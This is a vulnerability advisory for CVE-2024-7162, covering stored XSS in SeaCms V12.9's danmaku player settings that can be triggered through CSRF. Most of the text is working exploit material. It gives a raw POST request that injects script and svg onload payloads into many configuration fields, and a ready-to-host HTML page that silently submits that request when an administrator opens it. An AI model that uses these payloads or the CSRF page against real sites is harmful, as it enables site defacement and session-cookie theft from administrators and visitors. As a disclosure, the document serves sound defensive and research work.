SeaCms V12.9 Multiple Stored XSS Vulnerabilities

[Hebing123]

Summary

SeaCms V12.9 contains multiple stored XSS vulnerabilities originating from insufficient filtering of several configuration variables in data.php related to $yzm. These vulnerabilities can be exploited through the js/player/dmplayer/admin/post.php?act=setting endpoint, where multiple configuration variables within $yzm can be set.

Details

While the settings for the danmaku (bullet screen) system can only be modified by an administrator due to the inclusion of login.inc.php, the URL for the danmaku backend is fixed and lacks CSRF tokens. This makes it possible for attackers to exploit these XSS vulnerabilities through CSRF attacks. When an administrator opens a malicious link, the entire danmaku system of the site can be severely affected. By modifying the yzm.dmrule configuration value to "><script>alert(1)</script><svg onload=alert(1)>, this XSS vulnerability will affect multiple pages, severely compromising the site's danmaku system. For example, the vulnerabilities can impact:

/js/player/dmplayer/admin/index.php

/js/player/dmplayer/admin/api.php

/js/player/dmplayer/player/index.php

As a result, any user viewing any video on the SeaCms site in bilibili danmaku player will trigger the XSS vulnerability. This is because the js/player/dmplayer/player/js/setting.js script directly concatenates yzm.dmrule into an <a> tag.

POC

POST /js/player/dmplayer/admin/post.php?act=setting HTTP/1.1
Host: 192.168.0.10:1045
Content-Length: 981
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.10:1045
Referer: http://192.168.0.10:1045/js/player/dmplayer/admin/?act=1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [admin's Cookie]
Connection: close

yzm%5Bdanmuon%5D=on&yzm%5Bads%5D%5Bset%5D%5Bgroup%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bcolor%5D="><svg%20onload=alert(document.cookie)>&yzm%5Blogo%5D="><svg%20onload=alert(document.cookie)>F&yzm%5Btrytime%5D=999999&yzm%5Bwaittime%5D=5&yzm%5Bsendtime%5D=5&yzm%5Bdmrule%5D="><script>alert(1)</script><svg%20onload=alert(document.cookie)>&yzm%5Bpbgjz%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bjzuser%5D=&edit=1&yzm%5Bads%5D%5Bset%5D%5Bstate%5D=1&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Btime%5D=20&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Bimg%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bpic%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bvod%5D%5Burl%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bset%5D%5Bvod%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bpause%5D%5Bpic%5D="><svg%20onload=alert(document.cookie)>&yzm%5Bads%5D%5Bpause%5D%5Blink%5D="><svg%20onload=alert(document.cookie)>&edit=1

Attack POC

<html>
  <body>
    <form action="http://your-ip/js/player/dmplayer/admin/post.php?act=setting" method="POST">
      <input type="hidden" name="yzm&#91;danmuon&#93;" value="on" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;group&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;color&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;logo&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;F" />
      <input type="hidden" name="yzm&#91;trytime&#93;" value="999999" />
      <input type="hidden" name="yzm&#91;waittime&#93;" value="5" />
      <input type="hidden" name="yzm&#91;sendtime&#93;" value="5" />
      <input type="hidden" name="yzm&#91;dmrule&#93;" value="&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;pbgjz&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;jzuser&#93;" value="" />
      <input type="hidden" name="edit" value="1" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;state&#93;" value="1" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;pic&#93;&#91;time&#93;" value="20" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;pic&#93;&#91;img&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;pic&#93;&#91;link&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;vod&#93;&#91;url&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;set&#93;&#91;vod&#93;&#91;link&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;pause&#93;&#91;pic&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="yzm&#91;ads&#93;&#91;pause&#93;&#91;link&#93;" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;" />
      <input type="hidden" name="edit" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

Attackers can place the Attack POC as an HTML file on a server. When an administrator opens the file, it will send a POST request that disrupts the bilibili danmaku player.

[Hebing123]

CVE-2024-7162